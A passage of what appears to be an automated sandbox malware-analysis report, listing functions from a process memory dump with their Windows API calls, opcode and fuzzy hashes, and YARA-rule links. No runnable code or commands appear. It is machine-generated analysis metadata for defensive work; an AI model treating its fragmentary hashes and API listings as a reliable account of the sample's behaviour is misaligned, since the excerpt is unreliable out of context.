                                                                                                                                                                      • API String ID: 2875609808-0
                                                                                                                                                                      • Opcode ID: 64c62f49483003170138088ed543ea733eda83fdffeb2d690d5c171e1094a7d0
                                                                                                                                                                      • Instruction ID: f4447c9895bcb5f689b4ae87ad483917add2ba41bd92ddd1d50483f61f31d07e
                                                                                                                                                                      • Opcode Fuzzy Hash: 64c62f49483003170138088ed543ea733eda83fdffeb2d690d5c171e1094a7d0
                                                                                                                                                                      • Instruction Fuzzy Hash: D5112732D0052DEBCF029FA5E948AFEBB78FF09751F05409AEE40B6240CB309560CB96
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003A7207, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3016257755-0
                                                                                                                                                                      • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                                                                      • Instruction ID: 8de3a5a863d874a7aa50bba47a7be5ec8f26bc5233fcfb69a70f20603975366f
                                                                                                                                                                      • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                                                                      • Instruction Fuzzy Hash: 4E014B3614814ABBCF135E84CC859EE3F66FF6A351F598A15FA1858031D337C9B1AB81
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003FB57F, Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetWindowRect.USER32 ref: 003FB59E
                                                                                                                                                                      • ScreenToClient.USER32 ref: 003FB5B6
                                                                                                                                                                      • ScreenToClient.USER32 ref: 003FB5DA
                                                                                                                                                                      • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 003FB5F5
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 357397906-0
                                                                                                                                                                      • Opcode ID: 02db4cfd3377e916bd6c09ffef7333c900a05b36c1bbb921b6b98f73d59eae3f
                                                                                                                                                                      • Instruction ID: 9b39d5d17aaaf9c61784e48b46c27b9bcc219126eeff21bd423948ca00bcb805
                                                                                                                                                                      • Opcode Fuzzy Hash: 02db4cfd3377e916bd6c09ffef7333c900a05b36c1bbb921b6b98f73d59eae3f
                                                                                                                                                                      • Instruction Fuzzy Hash: 9D1134B9D00209EFDB41CF99C4849EEFBB9FF08310F104166E914E2220D735AA55CF50
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003FB8EF, Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memset$CloseCreateHandleProcess
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3277943733-0
                                                                                                                                                                      • Opcode ID: 053fe4a2c954fac672a6f57ad7f1fe1a2186435b8751d8424c2a4ec262d7a7a2
                                                                                                                                                                      • Instruction ID: 0a524429f37dd0569c0bffdc78ba1d54ca551c5a7bc4a591ef1281bcd8a21dd8
                                                                                                                                                                      • Opcode Fuzzy Hash: 053fe4a2c954fac672a6f57ad7f1fe1a2186435b8751d8424c2a4ec262d7a7a2
                                                                                                                                                                      • Instruction Fuzzy Hash: 1FF03AF65483047BF6212761AC45FBB7A9CEB08354F005031FB48D9292D7754910C7AC
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003D6E7C, Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 003D6E88
                                                                                                                                                                        • Part of subcall function 003D794E: _memset.LIBCMT ref: 003D7983
                                                                                                                                                                      • _memmove.LIBCMT ref: 003D6EAB
                                                                                                                                                                      • _memset.LIBCMT ref: 003D6EB8
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 003D6EC8
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 48991266-0
                                                                                                                                                                      • Opcode ID: e1d2d3bc3c42cbeb81658fd1ff703a3f473a726b108eb67e5c51c81dd347aad2
                                                                                                                                                                      • Instruction ID: d3f1be84f42c1682351f50295c9e7ce6ade7334e29e3c213a998abf154323958
                                                                                                                                                                      • Opcode Fuzzy Hash: e1d2d3bc3c42cbeb81658fd1ff703a3f473a726b108eb67e5c51c81dd347aad2
                                                                                                                                                                      • Instruction Fuzzy Hash: 62F0547A104200BBCF026F55EC85A59BB29EF45320F048065FE085E21AC731A911CBB4
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003FC00C, Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 003712F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0037134D
                                                                                                                                                                        • Part of subcall function 003712F3: SelectObject.GDI32(?,00000000), ref: 0037135C
                                                                                                                                                                        • Part of subcall function 003712F3: BeginPath.GDI32(?), ref: 00371373
                                                                                                                                                                        • Part of subcall function 003712F3: SelectObject.GDI32(?,00000000), ref: 0037139C
                                                                                                                                                                      • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 003FC030
                                                                                                                                                                      • LineTo.GDI32(00000000,?,?), ref: 003FC03D
                                                                                                                                                                      • EndPath.GDI32(00000000), ref: 003FC04D
                                                                                                                                                                      • StrokePath.GDI32(00000000), ref: 003FC05B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1539411459-0
                                                                                                                                                                      • Opcode ID: b8a41cccbb6bea6243481dc00e420b05e92294b79ae546e295f45446ee3aff46
                                                                                                                                                                      • Instruction ID: 9214c4b1ec91a57b6c4b82c9f3a81cc072d506d34e29ed7fe0799eb820c529a5
                                                                                                                                                                      • Opcode Fuzzy Hash: b8a41cccbb6bea6243481dc00e420b05e92294b79ae546e295f45446ee3aff46
                                                                                                                                                                      • Instruction Fuzzy Hash: 7FF05E3204525EFBDB236F55AC09FEE3F59AF0A311F048010FB11651E2CB755551DB99
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003CA37C, Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SendMessageTimeoutW.USER32 ref: 003CA399
                                                                                                                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 003CA3AC
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 003CA3B3
                                                                                                                                                                      • AttachThreadInput.USER32(00000000), ref: 003CA3BA
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2710830443-0
                                                                                                                                                                      • Opcode ID: ffc694b0eab79810c30028b3df5ced5196e75012cf3f83fce8fc0bd97bdb69d8
                                                                                                                                                                      • Instruction ID: 8a24c9ff0c46effee604c2ade808c5bfc1ca6b7bf72cad503fa544d41d6410e0
                                                                                                                                                                      • Opcode Fuzzy Hash: ffc694b0eab79810c30028b3df5ced5196e75012cf3f83fce8fc0bd97bdb69d8
                                                                                                                                                                      • Instruction Fuzzy Hash: FEE03931241268BADB221BA2DC0CFE73F1CEF167A1F008028F908C80A0CA758940CBA0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00372218, Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetSysColor.USER32(00000008), ref: 00372231
                                                                                                                                                                      • SetTextColor.GDI32(?,000000FF), ref: 0037223B
                                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 00372250
                                                                                                                                                                      • GetStockObject.GDI32(00000005), ref: 00372258
                                                                                                                                                                      • GetWindowDC.USER32(?,00000000), ref: 003AC0D3
                                                                                                                                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 003AC0E0
                                                                                                                                                                      • GetPixel.GDI32(00000000,?,00000000), ref: 003AC0F9
                                                                                                                                                                      • GetPixel.GDI32(00000000,00000000,?), ref: 003AC112
                                                                                                                                                                      • GetPixel.GDI32(00000000,?,?), ref: 003AC132
                                                                                                                                                                      • ReleaseDC.USER32 ref: 003AC13D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1946975507-0
                                                                                                                                                                      • Opcode ID: 2fac5d57476003d872dad7ee5a0fd4f5e8f8994ad9ddec4a6f5bb61fe7871b20
                                                                                                                                                                      • Instruction ID: 45031774f7cd77131e985edecd9de24323b8a77a93c8433bdf6e3c59d08af567
                                                                                                                                                                      • Opcode Fuzzy Hash: 2fac5d57476003d872dad7ee5a0fd4f5e8f8994ad9ddec4a6f5bb61fe7871b20
                                                                                                                                                                      • Instruction Fuzzy Hash: D2E0C932604244EEDB225F64EC497E87B18EB16336F148366FE69580E2C7728990DB11
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003C8C5A, Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentThread.KERNEL32 ref: 003C8C63
                                                                                                                                                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,003C882E), ref: 003C8C6A
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,003C882E), ref: 003C8C77
                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,003C882E), ref: 003C8C7E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CurrentOpenProcessThreadToken
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3974789173-0
                                                                                                                                                                      • Opcode ID: 5b832e7c1776fe5e20a34c5d19411b1a4a3d4a79805eb713df483cf96c4324b9
                                                                                                                                                                      • Instruction ID: e77c28078bc092f11f9759cb45c661bbe096fee16b1018248811372824895f64
                                                                                                                                                                      • Opcode Fuzzy Hash: 5b832e7c1776fe5e20a34c5d19411b1a4a3d4a79805eb713df483cf96c4324b9
                                                                                                                                                                      • Instruction Fuzzy Hash: 48E04F36642312AFD7215FB0AD0CF667BACAF50792F098838AA45C9040DA348841CB61
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003B2187, Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2889604237-0
                                                                                                                                                                      • Opcode ID: 8bfe4303e96049b373ac9e088c350b71016b4a89f79540e108e7f2df5aa76abd
                                                                                                                                                                      • Instruction ID: fdbaf003d1b1e0133f44e4a506e47c664185cf18b7b74d83a2f4de2feafa6b32
                                                                                                                                                                      • Opcode Fuzzy Hash: 8bfe4303e96049b373ac9e088c350b71016b4a89f79540e108e7f2df5aa76abd
                                                                                                                                                                      • Instruction Fuzzy Hash: 20E0C275800604AFDB129F60C848AAD7BB9AF48350F118429ED5AD6220CB388141DF40
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003B219B, Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2889604237-0
                                                                                                                                                                      • Opcode ID: 97de06aa51fa7eeedf1282ab04fac4f60179f2c369c8633c4907759cc2dbcfb1
                                                                                                                                                                      • Instruction ID: dacbbd1afb5116198299c1043fd59aff204a6d48330a38f995d4310b001741a6
                                                                                                                                                                      • Opcode Fuzzy Hash: 97de06aa51fa7eeedf1282ab04fac4f60179f2c369c8633c4907759cc2dbcfb1
                                                                                                                                                                      • Instruction Fuzzy Hash: 8CE0EEB5800204AFCF129FA0C848AAD7BB9AF4C310F108029FD5AEB220CF389141DF40
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003763A0, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: %@
                                                                                                                                                                      • API String ID: 0-2048787947
                                                                                                                                                                      • Opcode ID: b62613f8e38852dd5148a62a68546efd150b289abf5112371575c8384c40da2e
                                                                                                                                                                      • Instruction ID: f7153898e15daae1354875aa8816690f1b3110ed6d669904d2cac61c77523170
                                                                                                                                                                      • Opcode Fuzzy Hash: b62613f8e38852dd5148a62a68546efd150b289abf5112371575c8384c40da2e
                                                                                                                                                                      • Instruction Fuzzy Hash: 36B1C471800509ABCF36EF94C8A29FDB7B8FF45310F54C026E90AAB195DB389E81DB51
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003EB1B7, Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __itow_s
                                                                                                                                                                      • String ID: xrC$xrC
                                                                                                                                                                      • API String ID: 3653519197-2621228478
                                                                                                                                                                      • Opcode ID: 76d38d1ffb1d49042a79f0f52185dd472c19cb4f8adc0e2011c6411855923dc4
                                                                                                                                                                      • Instruction ID: 37729a3d77ab165da6885abee8d04c1b6a2205116b49376f069aba4f7cdaa193
                                                                                                                                                                      • Opcode Fuzzy Hash: 76d38d1ffb1d49042a79f0f52185dd472c19cb4f8adc0e2011c6411855923dc4
                                                                                                                                                                      • Instruction Fuzzy Hash: D2B18F70A00159AFCB26DF55C881EABF7B9FF58300F148569F9499B2D2DB34E941CB60
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003DB217, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0038FEC6: _wcscpy.LIBCMT ref: 0038FEE9
                                                                                                                                                                        • Part of subcall function 00379997: __itow.LIBCMT ref: 003799C2
                                                                                                                                                                        • Part of subcall function 00379997: __swprintf.LIBCMT ref: 00379A0C
                                                                                                                                                                      • __wcsnicmp.LIBCMT ref: 003DB298
                                                                                                                                                                      • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 003DB361
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                                                                                                      • String ID: LPT
                                                                                                                                                                      • API String ID: 3222508074-1350329615
                                                                                                                                                                      • Opcode ID: c28877e7c562ae6b68d33beed5d318cf777568f4c1564f2be5a95cdc27fb0005
                                                                                                                                                                      • Instruction ID: b0169a8a69fac68dcc8e7085573042fe5679424374f9141869fe6b2c6d09ddd1
                                                                                                                                                                      • Opcode Fuzzy Hash: c28877e7c562ae6b68d33beed5d318cf777568f4c1564f2be5a95cdc27fb0005
                                                                                                                                                                      • Instruction Fuzzy Hash: 72619476A00215EFCB16DF94D881EAEF7B8EF08310F12815AF546AB351D770AE40DB50
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003B8A77, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memmove
                                                                                                                                                                      • String ID: Oa8
                                                                                                                                                                      • API String ID: 4104443479-3496210839
                                                                                                                                                                      • Opcode ID: 4a20bbdb29d683cda4227eb5073a6f5447c7243d8960fce8728d70b83dd41ddd
                                                                                                                                                                      • Instruction ID: 28c6d9a7a559859403235695828e182eaccae17c7de0050df468505e98d4b36b
                                                                                                                                                                      • Opcode Fuzzy Hash: 4a20bbdb29d683cda4227eb5073a6f5447c7243d8960fce8728d70b83dd41ddd
                                                                                                                                                                      • Instruction Fuzzy Hash: 6D5170B0A00609DFCF26CF68C480AEEBBF5FF44308F15856AE95AD7640EB31A955CB51
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00382AB7, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • Sleep.KERNEL32(00000000), ref: 00382AC8
                                                                                                                                                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 00382AE1
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: GlobalMemorySleepStatus
                                                                                                                                                                      • String ID: @
                                                                                                                                                                      • API String ID: 2783356886-2766056989
                                                                                                                                                                      • Opcode ID: 2926ad00b87c0459ede72f28a92091dcd87a7fdf70f48abad70e99aa1275fea2
                                                                                                                                                                      • Instruction ID: 524794d0a3efd37b20161d093fd850826792aa35db41cadfe0ed74b97a80c2f7
                                                                                                                                                                      • Opcode Fuzzy Hash: 2926ad00b87c0459ede72f28a92091dcd87a7fdf70f48abad70e99aa1275fea2
                                                                                                                                                                      • Instruction Fuzzy Hash: 915156724187449BD321AF10D886BABBBF8FFC4310F82896EF1D9450A1DB349529CB26
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003D99BE, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0037506B: __fread_nolock.LIBCMT ref: 00375089
                                                                                                                                                                      • _wcscmp.LIBCMT ref: 003D9AAE
